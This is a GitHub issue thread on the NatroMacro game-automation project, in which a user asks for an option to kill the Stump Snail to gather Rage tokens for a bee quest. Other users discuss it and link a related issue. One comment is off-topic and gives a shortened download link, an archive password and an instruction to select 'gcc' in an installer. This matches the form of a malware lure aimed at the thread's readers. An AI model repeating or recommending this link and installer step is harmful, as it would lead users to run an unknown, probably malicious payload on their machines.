### ISSUE TITLE
Kill Stump snail for "Rage" token quests

### ISSUE THREAD

**Issue by Th3rox26** [NatroTeam/NatroMacro#694]
### Have you searched the existing suggestions?

No

### What is your suggestion?

Currently, to gather rage tokens Natro goes around killing bugs to collect rage tokens which is very inefficient as it doesn't give the rage bee enough time to spawn its tokens (e.g Natro only got ~80 rage tokens in about 5 hours of killing bugs for that quest). I suggest an option which makes it kill stump snail with the in built stump snail killing pattern, as it will give a lot more rage tokens than the latter option.

### How will this improve Natro Macro?

This will make the Gifted Riley Bee quests much easier to macro and allow many more quests to be completed.

### What is your Discord username?

Th3rox

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by DullSmallmega176** [comment]
this is actually a good recommendation, but overall this can also be helped with mondo, and ant (which some quests require but i don't think it's required in that specific quest)

basically any mobs that give a long time to kill

**Comment by misc-et** [comment]
https://github.com/NatroTeam/NatroMacro/issues/538
